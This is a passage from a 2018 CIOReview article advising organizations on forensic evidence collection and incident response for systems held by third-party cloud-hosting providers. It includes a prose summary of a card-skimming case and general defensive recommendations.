| |August 20189CIOReviewresponder physically access the system in the cloud-hosting facility? Many third-party facilities don't allow direct access to physical servers under their custody and control.If access is possible, can an image of the collected data be exported to a network share or storage device at the third-party cloud-hosting facility? If the digital investigation requires imaging a large system, possibly with a Network Attached Storage (NAS) device, finding a place for the forensically acquired information on the network can be a challenge. It's important to work with your cloud-hosting facility to understand how the forensic acquisition of a large amount of data within their cloud storage environment will occur.If remote imaging is the only option for evidence acquisition, then understanding and testing the access and forensic imaging process with your third-party cloud-hosting facility becomes even more critical, as data outputs may still be needed from local storage. Working through this proactively may prevent delays in acquisition. We have witnessed first-hand that having to work through multiple authorizations to gain physical, or even logical, access to your stored data during an ongoing cybersecurity incident can introduce unnecessary delays.Have a mature cloud-hosting provider on your sideWith this in mind, review your cloud-hosting services agreement in terms of being able to gather evidence and information--systems, memory, logs, and data--that you'll need for a forensic investigation. We've read solid agreements that prescribe compliance with customer requests but fall apart under the intense demands and rapid responses required during a cybersecurity incident.After reviewing your cloud-hosting services agreement, dry-run the cloud-hosting facility's ticketing system. These generally aren't designed to expedite the forensic imaging process of systems under their care and control. Ask the cloud-hosting services provider to share their incident response plan and any FAQs on how they'll respond to incidents and in doing so, how they'll cooperate with their customer during a cybersecurity incident.It's critical to ensure your cloud-hosting facility is aware that, in the event of a cybersecurity incident affecting your data at their location, you'll be requesting their cooperation. This is integral to accessing your data so that investigative responders can work as quickly and efficiently as possible. Remember, seasoned cloud-hosting service providers are mature in data privacy and security, and should be experienced in dealing with the aspects involving digital forensics and incident response.An example of Cloud Storming--"The Acumulus Datum" A scenario in the Verizon 2017 Data Breach Digest (DBD) illustrates why these precautions are so important. In this cloud-based digital forensics investigation, the victim organization had received customer complaints regarding their e-commerce website. The first attempt at payment would fail; however, upon second attempt, the transactions would go through. An inspection of the web page found it to be fake prompting the victim or-ganization to quickly take it offline.It turns out, a low-cost cloud ser-vice provider hosted the data halfway across the globe--fortunately, inves-tigative responders were on standby. After finally getting to the data, we were able to determine the fake pay-ment page was coded to upload cred-it card data in real time to an external IP address, and the second payment attempt processed the data legiti-mately. The story ended up having a happy ending, as the investigation re-vealed a flaw in the threat actor's code and no data was actually taken.General recommendations for security in the cloudSeveral additional prevention, miti-gation, response and investigation recommendations for cloud-related data breaches and cybersecurity inci-dents are summarized as follows:· Authenticate using multiple factors--at a minimum, implement two-factor authentication for access to all critical systems.· Limit access to critical assets--restrict direct access to trusted users and IP addresses only.· Make log data impactful--enable and centralize logging in a way that's easy for investiga-tive responders to access during a cybersecurity incident.· Leverage incident response playbooks--create incident response playbooks for the most relevant data breach and other cybersecurity incidents for your industry and organization.· Change admin passwords im-mediately--change local and network administrator passwords first in the event of a data breach.
< Page 8 | Page 10 >